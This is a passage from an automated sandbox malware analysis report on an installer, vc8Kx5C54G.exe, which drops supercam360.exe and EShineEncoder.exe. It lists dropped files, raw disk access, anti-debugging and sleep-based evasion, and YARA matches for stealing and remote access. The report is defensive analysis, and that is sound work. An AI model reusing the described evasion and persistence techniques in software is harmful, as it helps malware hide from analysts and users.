                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040993C push 00409979h; ret 1_2_00409971
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040A037 push ds; ret 1_2_0040A038
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004941B8 push ecx; mov dword ptr [esp], ecx1_2_004941BD
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004106C8 push ecx; mov dword ptr [esp], edx1_2_004106CD
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00412920 push 00412983h; ret 1_2_0041297B
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00484BE8 push ecx; mov dword ptr [esp], ecx1_2_00484BED
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040D020 push ecx; mov dword ptr [esp], edx1_2_0040D022
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004590F0 push 00459134h; ret 1_2_0045912C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00443438 push ecx; mov dword ptr [esp], ecx1_2_0044343C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00483544 push 00483633h; ret 1_2_0048362B
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040F580 push ecx; mov dword ptr [esp], edx1_2_0040F582
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0047759C push ecx; mov dword ptr [esp], edx1_2_0047759D
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004517CC push 004517FFh; ret 1_2_004517F7
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00451990 push ecx; mov dword ptr [esp], eax1_2_00451995
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0045FB44 push ecx; mov dword ptr [esp], ecx1_2_0045FB48
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00419C20 push ecx; mov dword ptr [esp], ecx1_2_00419C25
                    Source: supercam360.exe.1.drStatic PE information: section name: .rsti3 entropy: 7.752189549704677
                    Source: EShineEncoder.exe.5.drStatic PE information: section name: .rsti3 entropy: 7.752189549704677

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A4F
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D6F8A2
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-C77TD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A38H9.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-1NCOM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A5A81.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeFile created: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-QD1CQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\is-MF7B1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-MQ3QG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-F7KI7.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpFile created: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile created: C:\ProgramData\EShineEncoder\EShineEncoder.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile created: C:\ProgramData\EShineEncoder\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_00401A4F
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive05_2_02D6F8A2
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00423C04 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C04
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004241D4 IsIconic,SetActiveWindow,SetFocus,1_2_004241D4
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0042418C IsIconic,SetActiveWindow,1_2_0042418C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0041837C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_0041837C
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00422854 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_00422854
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00482EF8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00482EF8
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00417590 IsIconic,GetCapture,1_2_00417590
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00417CC6 IsIconic,SetWindowPos,1_2_00417CC6
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00417CC8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CC8
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0041F110 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F110
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60920C91 rdtsc 5_2_60920C91
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_00401B4B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,5_2_02D6F9A6
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeWindow / User API: threadDelayed 4125Jump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeWindow / User API: threadDelayed 5779Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-C77TD.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\LTDIS13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A38H9.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-1NCOM.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\bjpeg23.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-A5A81.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-QD1CQ.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\is-MF7B1.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\ltkrn13n.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PLD11.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-MQ3QG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\is-F7KI7.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5693
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-60804
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeAPI coverage: 3.4 %
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 6172Thread sleep count: 4125 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 6172Thread sleep time: -8250000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 1368Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 1368Thread sleep time: -2340000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 6172Thread sleep count: 5779 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe TID: 6172Thread sleep time: -11558000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00452A34 FindFirstFileA,GetLastError,1_2_00452A34
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,1_2_00474D70
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00462578 FindFirstFileA,FindNextFileA,FindClose,1_2_00462578
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004975B0
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463B04
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463F80
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeThread delayed: delay time: 60000Jump to behavior
                    Source: supercam360.exe, 00000005.00000002.2919541859.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, supercam360.exe, 00000005.00000002.2919541859.00000000009F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeAPI call chain: ExitProcess graph end nodegraph_0-6733
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeAPI call chain: ExitProcess graph end nodegraph_5-61390
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_5-60700
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60920C91 rdtsc 5_2_60920C91
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D801BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_02D801BE
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D801BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_02D801BE
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00450294 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00450294
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D6648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,5_2_02D6648B
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D79528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_02D79528
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00477F98 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00477F98
                    Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause super_cam_11234Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_0042E094 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E094
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_02D6F85A cpuid 5_2_02D6F85A
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: GetLocaleInfoA,0_2_004051FC
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: GetLocaleInfoA,0_2_00405248
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: GetLocaleInfoA,1_2_00408558
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: GetLocaleInfoA,1_2_004085A4
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_004583E8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004583E8
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmpCode function: 1_2_00455570 GetUserNameA,1_2_00455570
                    Source: C:\Users\user\Desktop\vc8Kx5C54G.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2920022648.0000000002752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: supercam360.exe PID: 6176, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2920022648.0000000002752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: supercam360.exe PID: 6176, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_609660FA
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,5_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,5_2_60963143
                    Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exeCode function: 5_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_6096A2BD
